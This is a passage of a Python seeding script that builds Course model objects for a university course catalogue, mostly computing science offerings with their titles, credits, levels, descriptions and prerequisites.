'\n\t\t\t\t\t\t\t'data compression and encryption; transport protocols; network addressing and '\n\t\t\t\t\t\t\t'routing; LAN and MAN medium access control; bridging; Wireless and mobile '\n\t\t\t\t\t\t\t'networking; evolution of network technology on the Internet, Multi-media '\n\t\t\t\t\t\t\t'protocols.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301 and CSC 8410'))\n\ncourses.append(models.Course(course = 'CSC 8580',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Network Management and Performance',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Monitoring and management of computer networks and network '\n\t\t\t\t\t\t\t'services; SNMP, CMIS, CMIP network management protocols and services; '\n\t\t\t\t\t\t\t'Management Informtion Base (MIB) development; performance analysis including '\n\t\t\t\t\t\t\t'queuing models; comparison of channel access protocols; other related topics '\n\t\t\t\t\t\t\t'as selected by the class. This course is frequently run as a seminar requiring '\n\t\t\t\t\t\t\t'a significant paper or project, consistent class preparation and participation.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8530 and CSC 8560'))\n\ncourses.append(models.Course(course = 'CSC 8600',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Object-Oriented Design and Programming',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Introduces the theoretical and practical issues underlying the '\n\t\t\t\t\t\t\t'object-oriented paradigm, including classes, encapsulation, inheritance and '\n\t\t\t\t\t\t\t'polymorphism. Primary topics also include object-oriented analysis and design, '\n\t\t\t\t\t\t\t'databases and technology transfer. The use of an object-oriented programming '\n\t\t\t\t\t\t\t'language, such as Java or C++, is an integral part of the course. Problems '\n\t\t\t\t\t\t\t'involving program design and implementation will be assigned. The student may '\n\t\t\t\t\t\t\t'be required to write a research paper and/or give an in-class presentation.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301 and CSC 8410'))\n\ncourses.append(models.Course(course = 'CSC 8700',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'System Programming in UNIX and C',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'The UNIX operating system: command interpreters, shell programming, '\n\t\t\t\t\t\t\t'process structure, file system, utilities like grep, sed, awk, and perl. C '\n\t\t\t\t\t\t\t'programming: file processing, libraries, program environment, system calls.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301 and CSC 8410'))\n\ncourses.append(models.Course(course = 'CSC 8800',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Applied Computer Science I',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Mathematical analysis, probability, statistics, optimization, '\n\t\t\t\t\t\t\t'queuing theory, digital signal processing; software engineering; UNIX, C, C++.',\n\t\t\t\t\t\t\tprerequisites = 'Permission of Instructor'))\n\ncourses.append(models.Course(course = 'CSC 8820',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Applied Computer Science III',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Client-user services; computer networking; communications link '\n\t\t\t\t\t\t\t'dynamics; astrodynamics.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8810'))\n\ncourses.append(models.Course(course = 'CSC 9010',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Special Topics',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Advanced elective study of topics of current interest and '\n\t\t\t\t\t\t\t'importance in the computer field. May be repeated for credit if topics '\n\t\t\t\t\t\t\t'are different.',\n\t\t\t\t\t\t\tprerequisites = 'Varies with the topic'))\n\ncourses.append(models.Course(course = 'CSC 9080',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Thesis Continuation',\n\t\t\t\t\t\t\tcredits = 0,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Continuation beyond the first semester for students who '\n\t\t\t\t\t\t\t'have registered for the thesis (CSC 9030).',\n\t\t\t\t\t\t\tprerequisites = 'CSC 9030'))\n\ncourses.append(models.Course(course = 'CSC 1030',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Problem Solving with Computers',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Using the microcomputer as a problem solving tool; system '\n\t\t\t\t\t\t\t'use; general purpose language programming; spreadsheet analysis and '\n\t\t\t\t\t\t\t'modeling; retrieving information from the Internet; strengths and weaknesses '\n\t\t\t\t\t\t\t'of computer based problem solutions.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1040',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computing with Images',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Image processing as an introduction to broader computing concepts; '\n\t\t\t\t\t\t\t'computational approaches to image processing and representation; multimedia tools.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'PHY 2601',\n\t\t\t\t\t\t\tdepartment = 'Physics',\n\t\t\t\t\t\t\ttitle = 'Computational Phy Lab I',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'Computational Physics',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1052',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Algorithms and Data Structures II',\n\t\t\t\t\t\t\tcredits = 4,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Object-oriented design: inheritance, interfaces, polymorphism; problem '\n\t\t\t\t\t\t\t'analysis; recursion; abstract data types; dynamically linked structures; linear data '\n\t\t\t\t\t\t\t'structures: stacks, queues, lists, vectors; sorting and searching; event-driven '\n\t\t\t\t\t\t\t'programming; graphical user interfaces.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1051 or ECE 1620'))\n\ncourses.append(models.Course(course = 'CSC 9000',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Guided Study',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Faculty directed study for one or a small number of students on a topic '\n\t\t\t\t\t\t\t'of mutual interest. Requires permission of the faculty sponsor and the director of '\n\t\t\t\t\t\t\t'the graduate program.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1300',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Discrete Structures',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Mathematical concepts that support computer science: sets, functions, '\n\t\t\t\t\t\t\t'relations, combinatorics, recurrences, boolean logic, mathematical proofs, matrices, '\n\t\t\t\t\t\t\t'graphs and trees.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1600',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Operating Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'System software design and implementation; process and resource '\n\t\t\t\t\t\t\t'management; concurrency, scheduling, and deadlock; memory management; file systems '\n\t\t\t\t\t\t\t'and security.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2400 or ECE 2042'))\n\ncourses.append(models.Course(course = 'CSC 1700',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Analysis of Algorithms',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Efficiency classifications and mathematical analysis of recursive '\n\t\t\t\t\t\t\t'and nonrecursive algorithms. Major algorithm design techniques: brute force, '\n\t\t\t\t\t\t\t'divide-and-conquer, decrease-and-conquer, transform-and-conquer, space and time '\n\t\t\t\t\t\t\t'tradeoffs, greedy approach, dynamic programming, backtracking and branch-and-bound. '\n\t\t\t\t\t\t\t'Introduction to NP-completeness, approximation algorithms. Applications to a wide '\n\t\t\t\t\t\t\t'variety of computational problems: sorting, searching, string processing, graphs, '\n\t\t\t\t\t\t\t'arithmetic, linear algebra.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2053'))\n\ncourses.append(models.Course(course = 'CSC 2053',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Platform Based Computing',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Course is project driven . Topics include identifying platform '\n\t\t\t\t\t\t\t'facilities and constraints, event driven programming, MVC pattern, client/server '\n\t\t\t\t\t\t\t'considerations, security-performance-accessibility issues, web/mobile programming, '\n\t\t\t\t\t\t\t'and application programmer interfaces.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052'))\n\ncourses.append(models.Course(course = 'CSC 2993',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Internship in Computing',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Internship in computer science open to second semester sophomores '\n\t\t\t\t\t\t\t'and above. Most likely, intern will participate in computer system development, '\n\t\t\t\t\t\t\t'maintenance, or evaluation in an environment which supports sound software '\n\t\t\t\t\t\t\t'engineering techniques.',\n\t\t\t\t\t\t\tprerequisites = 'Junior standing and 3.0 overall GPA'))\n\ncourses.append(models.Course(course = 'ECE 8471',\n\t\t\t\t\t\t\tdepartment = 'Electrical and Computer Engineering',\n\t\t\t\t\t\t\ttitle = 'Software Reliability',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Introduction to concepts of software reliability within the context '\n\t\t\t\t\t\t\t'of software systems development. The course will be useful to managers who require '\n\t\t\t\t\t\t\t'a broad understanding of the topic as well as to software designers, programmers and '\n\t\t\t\t\t\t\t'testers who may need to apply these concepts in detail. Topics: a selection of '\n\t\t\t\t\t\t\t'classical software reliability models. In addition, some of the broader issues '\n\t\t\t\t\t\t\t'impacting software reliability, such as software design and testing, will be studied.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'ECE 8429',\n\t\t\t\t\t\t\tdepartment = 'Electrical and Computer Engineering',\n\t\t\t\t\t\t\ttitle = 'Topics in Intelligent Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = ' ',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 4170',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Theory of Computation',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Finite automata and regular expressions; push down automata and '\n\t\t\t\t\t\t\t'context-free grammars; Turing machines; Church\\'s thesis; computability; '\n\t\t\t\t\t\t\t'NP-completeness.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1700'))\n\ncourses.append(models.Course(course = 'CSC 4200',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Advanced Algorithms and Complexity',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Greedy algorithms, divide-and-conquer; dynamic programming; '\n\t\t\t\t\t\t\t'backtracking; branch-and-bound; linear and integer programming; Fast Fourier '\n\t\t\t\t\t\t\t'Transforms; probabilistic algorithms; NP-complete problems and approximation '\n\t\t\t\t\t\t\t'methods.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1700'))\n\ncourses.append(models.Course(course = 'CSC 4280',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Parallel Algorithms and Architecture',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Design and analysis of parallel algorithms for arithmetic, matrix '\n\t\t\t\t\t\t\t'operations, sorting, simulation, combinatorial and graph problems, and Fast Fourier '\n\t\t\t\t\t\t\t'Transforms; taxonomies of parallel architectures; interconnection networks, meshes, '\n\t\t\t\t\t\t\t'trees, and hypercubes; scalability and speed-up.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1700 and CSC 2405'))\n\ncourses.append(models.Course(course = 'CSC 4490',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Data Warehousing and Mining',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Tools and techniques, theory and practice for storage and effective '\n\t\t\t\t\t\t\t'use of massive data sets.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 4480 and (CSC 2300 or MAT 2310 or MAT 4310)'))\n\ncourses.append(models.Course(course = 'CSC 4550',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Expert and Knowledge Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Knowledge representation, uncertainty, automated knowledge acquisition, '\n\t\t\t\t\t\t\t'practical aspects of implementing expert systems.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1051'))\n\ncourses.append(models.Course(course = 'CSC 4600',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Distributed Processing Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Data concurrency; distributed file systems and databases; distributed '\n\t\t\t\t\t\t\t'operating systems; security; interprocess communication; directory services; process '\n\t\t\t\t\t\t\t'migration; process vulnerability to partial failure.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2405'))\n\ncourses.append(models.Course(course = 'CSC 4700',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Software Engineering',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Management and production of software systems; the software life cycle; '\n\t\t\t\t\t\t\t'software design techniques and methodologies; participation in a team software '\n\t\t\t\t\t\t\t'development project.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052'))\n\ncourses.append(models.Course(course = 'CSC 4790',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Senior Projects',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Capstone course centered around a semester long software development '\n\t\t\t\t\t\t\t'or research project; project planning; requirements elicitation and specification; '\n\t\t\t\t\t\t\t'teamwork; oral presentations required of all students.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 4700'))\n\ncourses.append(models.Course(course = 'CSC 5900',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Seminar in Computing',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Study and discussion of selected topics in computing with presentations '\n\t\t\t\t\t\t\t'by individual students. May be repeated for credit if topics are different.',\n\t\t\t\t\t\t\tprerequisites = 'Varies with the topic'))\n\ncourses.append(models.Course(course = 'CSC 5940',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Topics in Information Science',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Lecture presentation of selected topics in information science. May be '\n\t\t\t\t\t\t\t'repeated for credit if topics are different.',\n\t\t\t\t\t\t\tprerequisites = 'Varies with the topic'))\n\ncourses.append(models.Course(course = 'CSC 5993',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Independent Study',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Reading, research and/or projects in a selected area of computer '\n\t\t\t\t\t\t\t'science under the direction of a member of the staff. May be repeated for credit.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8810',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Applied Computer Science II',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Software engineering: object-oriented analysis and design, database '\n\t\t\t\t\t\t\t'management, graphical user interfaces, system engineering.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8800'))\n\ncourses.append(models.Course(course = 'CSC 8100',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Technology for Human Organizations',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Leading-edge technologies and their applications in a variety of '\n\t\t\t\t\t\t\t'organzational settings. Presumes literacy in basic computer applications: word '\n\t\t\t\t\t\t\t'processing, desktop publishing, spreadsheets and communications.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8500',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Formal Grammars and Programming Language Theory',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Machines; nondeterminism; simulation; finite machines and regular '\n\t\t\t\t\t\t\t'languages; grammars; stack, counter, and tape machines; computability.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301 and CSC 8310'))\n\ncourses.append(models.Course(course = 'CSC 8505',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Compiler Construction',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Finite state methods for lexical and syntactical analysis; '\n\t\t\t\t\t\t\t'symbol-table construction, run-time code organization for block-structured '\n\t\t\t\t\t\t\t'languages, intermediate code generation, and pseudo-object machines; LR(k) and '\n\t\t\t\t\t\t\t'LL(k) parsers. Programming assignments and exercises are given.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301 and CSC 8310'))\n\ncourses.append(models.Course(course = 'CSC 8520',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Artificial Intelligence',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Problem-solving methods; knowledge representation; search; '\n\t\t\t\t\t\t\t'predicate calculus; automated theorem proving; natural language processing.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301'))\n\ncourses.append(models.Course(course = 'CSC 8550',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Concepts of Data Communications',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Analog and digital transmission; media; communication channels; '\n\t\t\t\t\t\t\t'digital IDN carriers: T1, T3, SONET. Asynchronous and synchronous transmission; '\n\t\t\t\t\t\t\t'link protocols; multiplexing; switching: circuit and packet; voice and data '\n\t\t\t\t\t\t\t'PBXs; X.25, frame relay, ATM, ISDN; local area networks; OSI model; routing '\n\t\t\t\t\t\t\t'and transport; management.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8400'))\n\ncourses.append(models.Course(course = 'CSC 8570',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'User/System Interface Design',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'The design and measurement of human-computer interfaces, with '\n\t\t\t\t\t\t\t'the objectives of developing models of user communities, summarizing current '\n\t\t\t\t\t\t\t'research in user-oriented design, defining design criteria for the user/system '\n\t\t\t\t\t\t\t'interface, and constructing test strategies for interactive software systems.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8590',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Advanced Software Engineering',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'In-depth coverage of software engineering topics such as: resue, '\n\t\t\t\t\t\t\t'metrics, CASE tools, design methodologies, reengineering, experimentation, '\n\t\t\t\t\t\t\t'automatic programming, software safety, development environments, reliability '\n\t\t\t\t\t\t\t'theory, risk management, and standards. The student may be required to write a '\n\t\t\t\t\t\t\t'research paper and/or give an in-class presentation.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8540'))\n\ncourses.append(models.Course(course = 'CSC 8610',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Multimedia Technology',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Theory and practice of multimedia content, representation, '\n\t\t\t\t\t\t\t'compression, storage, and delivery. Content types include text, audio, images, '\n\t\t\t\t\t\t\t'graphics, animations, and video. Student projects and presentations are generally '\n\t\t\t\t\t\t\t'an integral part of the course.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8710',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Advanced System Programming',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'The UNIX kernel: architecture, inodes, process control, memory '\n\t\t\t\t\t\t\t'management, I/O subsystem. System calls in C: execution environment, memory '\n\t\t\t\t\t\t\t'management, terminal control, locking, file management, process management, '\n\t\t\t\t\t\t\t'interprocess communication. C ibraries. Program development and debugging tools.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8700'))\n\ncourses.append(models.Course(course = 'CSC 8720',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'System Administration Concepts',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'UNIX login process. Standard root, device and user directories and '\n\t\t\t\t\t\t\t'files. File system construction and management. Disk status and partitions. '\n\t\t\t\t\t\t\t'Monitoring system performance. Networking and communication.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8700'))\n\ncourses.append(models.Course(course = 'CSC 8750',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Expert Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Knowledge representation and reasoning techniques; forward and '\n\t\t\t\t\t\t\t'backward chaining; semantic net and frame systems; uncertainty, automated knowledge '\n\t\t\t\t\t\t\t'acquisition; practical guidelines for implementing expert systems.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8520'))\n\ncourses.append(models.Course(course = 'CSC 9020',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Independent Study',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Individual research project in an advanced area of computer science, '\n\t\t\t\t\t\t\t'conducted under the guidance of a faculty member.
'\n\t\t\t\t\t\t\t'Click here to go to the Graduate Independent Study Page.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8520'))\n\ncourses.append(models.Course(course = 'CSC 9021',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Independent Study Continuation',\n\t\t\t\t\t\t\tcredits = 0,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Continuation beyond the first semester for students who have registered '\n\t\t\t\t\t\t\t'for the independent study (CSC 9020).',\n\t\t\t\t\t\t\tprerequisites = 'CSC 9020'))\n\ncourses.append(models.Course(course = 'CSC 9030',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Thesis',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Expanded independent study in which the student makes an original '\n\t\t\t\t\t\t\t'contribution to the computer science field. For more information about graduate '\n\t\t\t\t\t\t\t'thesis click here ',\n\t\t\t\t\t\t\tprerequisites = 'CSC 9020'))\n\ncourses.append(models.Course(course = 'CSC 8990',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Graduate Computing Practicum',\n\t\t\t\t\t\t\tcredits = 1,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Work experience in computing. CSC graduate program approval required '\n\t\t\t\t\t\t\t'for a specific work opportunity. Required for the practicum option of the MSCS degree.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 9020'))\n\ncourses.append(models.Course(course = 'PHI 2180',\n\t\t\t\t\t\t\tdepartment = 'Philosophy',\n\t\t\t\t\t\t\ttitle = 'Computer Ethics',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Codes of professional ethics, unauthorized access, ownership of software, '\n\t\t\t\t\t\t\t'and the social responsibility of computing professionals.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'MAT 4310',\n\t\t\t\t\t\t\tdepartment = 'Mathematics',\n\t\t\t\t\t\t\ttitle = 'Statistical Methods',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Data displays and summarization, probability distributions, point and '\n\t\t\t\t\t\t\t'interval estimation, hypothesis testing, categorical data analysis, regression and '\n\t\t\t\t\t\t\t'correlation.',\n\t\t\t\t\t\t\tprerequisites = 'MAT 1505'))\n\ncourses.append(models.Course(course = 'CSC 3080',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Information Security and Protection',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'Explores the criticality of protecting information\\'s availability, '\n\t\t\t\t\t\t\t'accuracy, authenticity, confidentiality, and integrity. Analysis of topics to include '\n\t\t\t\t\t\t\t'redundancy, backup and recovery, business continuity, security technologies, and '\n\t\t\t\t\t\t\t'controls such as audit, change management and testing.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2400'))\n\ncourses.append(models.Course(course = 'CSC 9025',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Grand Challenges of Computing',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Individual or group research/development project involving an advanced '\n\t\t\t\t\t\t\t'area of computer science, conducted under the guidance of a faculty member.
